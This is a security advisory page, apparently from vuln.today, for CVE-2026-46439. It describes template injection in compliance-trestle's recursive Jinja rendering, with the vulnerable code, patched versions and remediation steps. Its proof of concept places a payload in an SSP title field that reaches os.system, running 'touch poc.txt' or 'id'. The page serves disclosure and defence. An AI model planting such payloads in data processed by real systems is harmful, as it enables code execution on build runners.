Skip to main content

compliance-trestle CVE-2026-46439

HIGH
Code Injection (CWE-94)
2026-05-28 https://github.com/oscal-compass/compliance-trestle GHSA-gg2g-p7xc-qqmm
7.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.8 HIGH
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector
Local
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

2
Source Code Evidence Fetched
May 28, 2026 - 19:50 vuln.today
Analysis Generated
May 28, 2026 - 19:50 vuln.today

DescriptionGitHub Advisory

A High severity Server-Side Template Injection (SSTI) vulnerability exists in the trestle author jinja command. The command recursively evaluates rendered templates, allowing an attacker to achieve arbitrary command execution with privileges of the running process by injecting malicious payloads into data fields (such as SSP documents or Lookup Tables).

The vulnerability does not require attacker control of the template itself. Only attacker-controlled input data rendered into a trusted template is required.

This distinction is critical: the template author may only intend to render plain text (e.g., Title: {{ ssp.metadata.title }}), but because of the recursive parsing, the data field itself becomes executable.

The vulnerability is caused by recursive re-compilation and re-rendering of already-rendered output.

Details

In trestle/core/commands/author/jinja.py, the render_template method performs recursive template evaluation to allow nesting within expressions:

python
    @staticmethod
    def render_template(template: Template, lut: Dict[str, Any], template_folder: pathlib.Path) -> str:
        new_output = template.render(**lut)
        output = ''
        error_countdown = JinjaCmd.max_recursion_depth
        while new_output != output and error_countdown > 0:
            error_countdown = error_countdown - 1
            output = new_output
            random_name = uuid.uuid4()
            dict_loader = DictLoader({str(random_name): new_output})
# jinja_env does not use SandboxedEnvironment
            jinja_env = Environment(
                loader=ChoiceLoader([dict_loader, FileSystemLoader(template_folder)]),
                extensions=extensions(),
                autoescape=True,
                trim_blocks=True
            )
            template = jinja_env.get_template(str(random_name))
            new_output = template.render(**lut)
        return output

When a fully trusted and static template resolves a variable from an attacker-controlled data source, the attacker's string is injected into the output. During the next pass of the while loop, this output is loaded into a new Environment via DictLoader and rendered again. Because jinja_env does not use SandboxedEnvironment, attacker-controlled template expressions embedded in data fields are re-evaluated as executable Jinja templates during recursive rendering.

PoC (Proof of Concept)

The vulnerability survives even when the template itself is fully trusted and static. Tested on Jinja2 version 3.1.6.

  1. Create a fully trusted template (template.j2) that simply renders a data variable from an external SSP model:
jinja2
Title: {{ ssp.metadata.title }}
  1. Generate a malicious OSCAL SSP document (system-security-plans/malicious_ssp/system-security-plan.json) where the title field contains a Jinja execution payload. This demonstrates how data becomes code execution:
json
{
  "system-security-plan": {
    "uuid": "208dbe11-e6e2-411a-af18-095cd17a6a70",
    "metadata": {
      "title": "{{ namespace.__init__.__globals__.os.system('touch poc.txt') }}",
      "last-modified": "2024-01-01T00:00:00+00:00",
      "version": "1.0",
      "oscal-version": "1.0.4"
    },
    "import-profile": { "href": "trestle://profiles/test_profile/profile.json" }
  }
}
  1. Execute the trestle author jinja command against the malicious data:
bash
trestle author jinja -i template.j2 -o out.md -ssp malicious_ssp

*(Note: A similar payload injected via the -lut yaml argument yields identical results.)*

  1. Verify arbitrary command execution:
bash
ls poc.txt
# The file poc.txt is successfully created on the filesystem.

An attacker can also execute arbitrary shell commands directly, e.g.:

json
      "title": "{{ namespace.__init__.__globals__.os.system('id') }}",

Impact

This vulnerability allows arbitrary command execution with the privileges of the running process. If compliance-trestle is used in an automated pipeline (such as CI/CD workflows generating documentation from third-party vendor-supplied SSPs), a malicious payload embedded in a data field (like a system title or description) will result in a compromised runner environment. The user/operator must process the attacker-controlled SSP or LUT, satisfying the user interaction metric.

AnalysisAI

Server-side template injection in the compliance-trestle trestle author jinja command enables arbitrary command execution when operators process attacker-controlled OSCAL data (SSP documents or Lookup Tables). Because the renderer recursively re-evaluates already-rendered output through a non-sandboxed Jinja2 Environment, malicious Jinja expressions placed in data fields like a system title are executed in a second pass even when the template itself is trusted and static. A proof-of-concept is published in the GHSA advisory; no public exploit identified at time of analysis as actively used in the wild, and the issue is not on CISA KEV.

Technical ContextAI

compliance-trestle is a Python (pip package) OSCAL authoring toolkit maintained by the oscal-compass project. The vulnerable code in trestle/core/commands/author/jinja.py implements render_template using a while loop that repeatedly compiles the previous render output as a new Jinja2 template via DictLoader inside a standard jinja2.Environment - explicitly not a SandboxedEnvironment. This realizes CWE-94 (Improper Control of Generation of Code, 'Code Injection') as classic SSTI: data fields become executable code on the second pass, allowing payloads such as {{ namespace.__init__.__globals__.os.system(...) }} to escape Jinja and reach Python's os.system. Affected packages per the GHSA are pkg:pip/compliance-trestle versions <= 3.12.1 and >= 4.0.0, < 4.0.3.

RemediationAI

Vendor-released patch: upgrade compliance-trestle to 3.12.2 (3.x branch) or 4.0.3 (4.x branch); the fixes are in commits 247fcce289f60103f3d8e28d8ec51a6986b94fb6 and 7d107b3ac53caca7bde97a6278b23cd739d94525, which remove the recursive while loop in render_template so templates are rendered exactly once and attacker-controlled data is no longer re-compiled as Jinja. If immediate upgrade is not possible, stop running trestle author jinja against any SSP, profile, or LUT obtained from untrusted parties and require human review of OSCAL data before pipeline ingestion; in CI/CD, isolate the runner (ephemeral container, no production credentials, network egress restrictions) to contain RCE if a malicious artifact is processed. Note the trade-off: disabling the jinja author flow blocks automated documentation generation, and the upstream fix also removes the nested-expression recursion feature, so any internal templates that relied on rendering one Jinja expression to produce another will need to be flattened. Reference the advisory at https://github.com/oscal-compass/compliance-trestle/security/advisories/GHSA-gg2g-p7xc-qqmm.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-46439 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy